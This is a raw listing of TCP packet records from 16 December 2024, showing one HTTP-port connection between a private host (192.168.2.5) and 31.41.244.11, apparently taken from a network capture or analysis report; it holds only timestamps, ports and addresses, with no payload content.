Dec 16, 2024 11:03:19.755394936 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.755464077 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.755512953 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.756728888 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.756766081 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.756782055 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.756812096 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.757724047 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.757761955 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.757775068 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.757831097 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.758809090 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.759083986 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.759140015 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.759915113 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.759969950 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.760080099 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.760133028 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.761162996 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.761198997 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.761253119 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.762258053 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.762356043 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.762412071 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.762465000 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.763377905 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.763427019 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.763433933 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.763484001 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.764688969 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.764725924 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.764745951 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.764775991 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.765726089 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.765775919 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.765887022 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.765935898 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.766895056 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.766947985 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.767029047 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.767079115 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.768104076 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.768153906 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.768218994 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.768269062 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.769212008 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.769324064 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.769382000 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.770386934 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.770442009 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.770443916 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.770489931 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.771491051 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.771543026 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.771625042 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.771673918 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.772644997 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.772696018 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.772738934 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.772790909 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.773845911 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.773897886 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.773901939 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.773951054 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.774959087 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.775011063 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.775064945 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.775111914 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.776220083 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.776257038 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.776271105 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.776303053 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.777297974 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.777544022 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.777594090 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.778516054 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.778565884 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.778618097 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.778666973 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.779699087 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.779747009 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.779807091 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.779855967 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.780878067 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.780914068 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.780947924 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.780961037 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.782042980 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.782111883 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.782165051 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.783134937 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.783243895 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.783293009 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.783343077 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.784257889 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.784312963 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.784427881 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.784487009 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.785382032 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.785510063 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.785562038 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.786483049 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.786535978 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.786592960 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.786643028 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.787645102 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.787694931 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.787759066 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.787807941 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.788832903 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.788885117 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.788933039 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.788985968 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.790143967 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.790179968 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.790195942 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.790213108 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.791173935 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.791224003 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.791232109 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.791281939 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.792324066 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.792386055 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.792428970 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.792478085 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.793499947 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.793534994 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.793589115 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.794646025 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.794681072 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.794698954 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.794724941 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.795722961 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.795772076 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.795950890 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.796003103 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.796869993 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.796924114 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.796982050 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.797034979 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.798110008 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.798161983 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.798222065 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.798270941 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.799247980 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.799299002 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.799381018 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.799431086 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.800352097 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.800400972 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.932065010 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.932122946 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.932250023 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.932429075 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.932466030 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.932482004 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.932512045 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.933471918 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.933527946 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.933593035 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.934756041 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.934817076 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.934887886 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.934937954 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.935769081 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.935827017 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.935970068 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.936022043 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.937060118 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.937177896 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.937239885 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.938079119 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.938138008 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.938189030 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.938236952 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.939229012 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.939279079 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.939358950 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.939407110 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.940418959 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.940466881 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.940723896 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.940772057 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.941674948 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.941710949 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.941759109 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.942754030 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.942790985 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.942806005 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.942837000 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.943983078 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.944020033 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.944031954 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.944072008 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.945162058 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.945199013 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.945246935 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.946176052 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.946237087 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.946314096 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.946361065 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.947454929 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.947572947 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.947632074 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.947684050 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.948558092 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.948594093 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.948609114 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.948638916 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.949677944 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.949795008 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.949853897 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.950784922 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.950840950 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.950891972 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.950941086 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.952007055 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.952043056 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.952097893 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.953193903 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.953228951 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.953284979 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.954371929 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.954406023 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.954468966 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.955528975 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.955564022 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.955601931 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.955638885 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.956602097 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.956736088 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.956789017 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.957794905 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.957832098 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.957882881 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.958937883 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.958996058 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.959022999 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.959070921 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.960072041 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.960128069 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.960195065 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.960246086 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.961189985 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.961321115 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.961371899 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.962408066 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.962460995 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.962524891 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.962574959 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.963490009 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.963542938 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.963608027 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.963660002 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.964680910 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.964731932 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.964742899 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.964792967 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.965946913 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.965984106 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.966034889 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.967030048 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.967082977 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.967219114 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.967271090 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.968178034 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.968281031 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.968348980 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.968399048 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.969327927 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.969443083 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.969494104 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.970478058 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.970535994 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.970603943 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.970654011 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.971716881 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.971755028 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.971771002 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.971801996 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.972740889 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.972791910 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.972853899 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.972901106 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.973907948 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.974018097 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.974071026 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.975070000 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.975123882 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.975189924 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.975244045 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.976465940 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.976514101 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.976524115 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.976561069 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.977478027 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.977514029 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.977533102 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.977556944 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.978662014 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.978698969 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.978749037 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.979804039 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.979841948 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.979857922 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.979887009 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.980954885 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.980989933 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.981043100 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.982161045 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.982213974 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.982274055 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.982325077 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.983211040 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.983263016 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.983319998 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.984329939 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.984397888 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.984467030 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.984519005 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.985543013 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.985596895 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.985652924 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.986644983 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.986711025 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.986805916 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.986895084 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.987835884 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.987871885 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.987940073 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.989046097 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.989082098 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.989140987 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.990170956 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.990207911 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.990230083 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.990250111 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:19.991348028 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.991383076 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:19.991408110 CET	49800	80	192.168.2.5	31.41.244.11
